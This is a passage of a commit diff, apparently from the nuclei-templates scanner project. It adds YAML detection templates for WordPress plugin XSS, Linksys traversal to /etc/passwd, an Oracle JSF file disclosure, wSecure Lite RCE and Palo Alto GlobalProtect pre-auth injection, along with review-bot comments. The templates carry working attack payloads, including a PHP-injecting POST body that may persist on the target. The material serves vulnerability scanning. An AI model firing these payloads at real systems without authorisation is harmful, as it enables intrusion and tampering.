commit
dd8f248892
|
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||||
| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 |
|
| cves | 460 | vulnerabilities | 236 | exposed-panels | 200 |
|
||||||
| takeovers | 70 | exposures | 116 | technologies | 120 |
|
| takeovers | 70 | exposures | 116 | technologies | 125 |
|
||||||
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
|
| misconfiguration | 77 | workflows | 33 | miscellaneous | 27 |
|
||||||
| default-logins | 37 | file | 42 | dns | 10 |
|
| default-logins | 44 | file | 42 | dns | 10 |
|
||||||
| fuzzing | 10 | helpers | 9 | iot | 18 |
|
| fuzzing | 10 | helpers | 9 | iot | 18 |
|
||||||
|
|
||||||
**128 directories, 1551 files**.
|
**134 directories, 1596 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: CVE-2009-1558
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||||
|
reference: https://www.exploit-db.com/exploits/32954
|
||||||
|
tags: cve,cve2009,iot,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2012-1835
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
|
||||||
|
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
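Review bot: The four commented-out `# - '{{BaseURL}}/.../agenda-widget-form.php?...'` style lines under `path:` are dead configuration with no record of why they are disabled, so the next maintainer cannot tell whether they failed to reflect, were never tested, or are parked for later. Either drop them or replace them with one comment that states the decision, e.g. `# Only agenda-widget.php?title is probed; the other vectors listed in the description are not exercised by this template.` Keeping a single live probe also keeps the number of near-identical requests sent per host to one.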
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2013-3827
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Javafaces LFI
|
||||||
|
author: Random-Robbie
|
||||||
|
severity: medium
|
||||||
|
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
|
||||||
|
tags: cve,cve2013,lfi,javafaces,oracle
|
||||||
|
reference: |
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
|
||||||
|
- https://www.exploit-db.com/exploits/38802
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||||
|
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<web-app"
|
||||||
|
- "</web-app>"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
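Review bot: `reference: |` turns the two URLs into one multi-line string whose lines begin with a literal `- `, not a YAML sequence; nuclei appears to tolerate either form, but anything that consumes references as a list receives a single blob to re-split. Dropping the `|` gives a proper sequence: `reference:` / `  - https://nvd.nist.gov/vuln/detail/CVE-2013-3827` / `  - https://www.exploit-db.com/exploits/38802`. The same block-scalar form appears in CVE-2016-10960, CVE-2017-15944, CVE-2017-17059, CVE-2018-12031, CVE-2019-12616, CVE-2019-15713 and CVE-2019-20085 in this commit. Separately, `name: Javafaces LFI` is misspelled (JavaServer Faces) and says far less than the sibling names; something like `name: Oracle JSF (GlassFish/WebLogic) - web.xml Disclosure via javax.faces.resource` would describe what the listed paths actually test.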
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2016-1000128
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
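Review bot: The `info` block has no `description`, unlike every other new XSS template in this commit (compare CVE-2016-1000129's `description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3`); CVE-2016-1000131 has the same gap. Following the sibling pattern, `description: Reflected XSS in wordpress plugin anti-plagiarism <= 3.60 via the js.php m parameter` would document what the single request under `path:` exercises. Without it, a triager reading a finding gets only the plugin name and the CVE id.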
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000129
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000130
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin e-search v1.0
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2016-1000131
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000132
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000133
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000134
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2016-1000135
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin hdw-tube v1.2
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123);</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2016-10960
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
|
||||||
|
author: daffainfo
|
||||||
|
severity: critical
|
||||||
|
description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
|
||||||
|
reference: |
|
||||||
|
- https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
|
||||||
|
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
|
||||||
|
tags: cve,cve2016,wordpress,wp-plugin,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
|
||||||
|
body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Nuclei: CVE-2016-10960"
|
||||||
|
condition: and
|
||||||
|
part: header
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
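Review bot: The `body:` payload closes a PHP string and class and then re-opens `class WSecureConfig2 {var $test="`, which only makes sense if the `publish` value is written back into the plugin's wsecure-config.php; if that is the case, this template is not a read-only probe but a persistent write that leaves a `header("Nuclei: CVE-2016-10960")` call in the target's configuration after the scan. Nothing in `info` says so, and operators filtering on `severity` or `tags` get no signal that the check is intrusive; a sentence in `description` such as `Note: this check writes to wsecure-config.php on the target and the injected header call persists until the file is restored.` plus an `intrusive` tag would make that explicit and excludable. Also, `condition: and` under a single-entry `words:` list is redundant and can be dropped.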
@ -2,22 +2,26 @@ id: CVE-2017-15944
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: PreAuth RCE on Palo Alto GlobalProtect
|
name: PreAuth RCE on Palo Alto GlobalProtect
|
||||||
author: emadshanab
|
author: emadshanab,milo2012
|
||||||
reference: http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/43342
|
||||||
|
- http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
|
||||||
severity: high
|
severity: high
|
||||||
tags: cve,cve2017,rce,vpn,paloalto
|
tags: cve,cve2017,rce,vpn,paloalto,globalprotect
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/global-protect/portal/css/login.css"
|
GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Cookie: PHPSESSID={{randstr}};
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT"
|
- "@start@Success@end@"
|
||||||
part: header
|
part: body
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
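Review bot: The template moved from a passive fingerprint (`Last-Modified` on login.css) to an active `raw:` request that sends an injection payload and judges success by `@start@Success@end@` in the body, yet `info` still carries no `description` explaining what that marker demonstrates or that the check is no longer a static-asset fetch; a one-line `description:` after `name:` is the minimum a triager needs. `severity: high` also sits oddly under a `name:` that says PreAuth RCE, when CVE-2016-10960 in the same commit rates its RCE `critical`; if high is intentional, the reason belongs in the description. The `status:` value and the end of the `matchers` list lie outside the hunk, so whether the status check was kept in step with the new response cannot be seen here.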
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-17043
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2017-17059
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
|
||||||
|
reference: |
|
||||||
|
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
|
||||||
|
|
||||||
|
body: "amty_hidden=1"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-17451
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-18536
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
|
||||||
|
reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<img src=x onerror=javascript:prompt(123)>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
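Review bot: The only evidence the body matcher requires is the reflected `<img src=x onerror=javascript:prompt(123)>` on a generic `/?author=1...` request, with nothing tying the response to the Stop User Enumeration plugin, so any site that echoes the `author` query string unescaped will be reported under this CVE. This commit fixes the same weakness elsewhere by adding `- "catch-breadcrumb"` with `condition: and` in one template and a `nova-lite` word matcher in another; the new CVE-2018-11709 (`/index.php/community/?...`) and CVE-2019-15713 (`/?rsd=...`) templates share the gap. A second word specific to the plugin's markup, e.g. `- "<PLUGIN-SPECIFIC-MARKER>"` with `condition: and`, would bring these three in line with that fix.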
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2017-9288
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter).
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288
|
||||||
|
tags: cve,cve2017,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<img src=x onerror=alert(123)>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-11709
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
|
||||||
|
tags: cve,cve2018,wordpress,xss,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<script>alert(123)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-12031
|
||||||
|
|
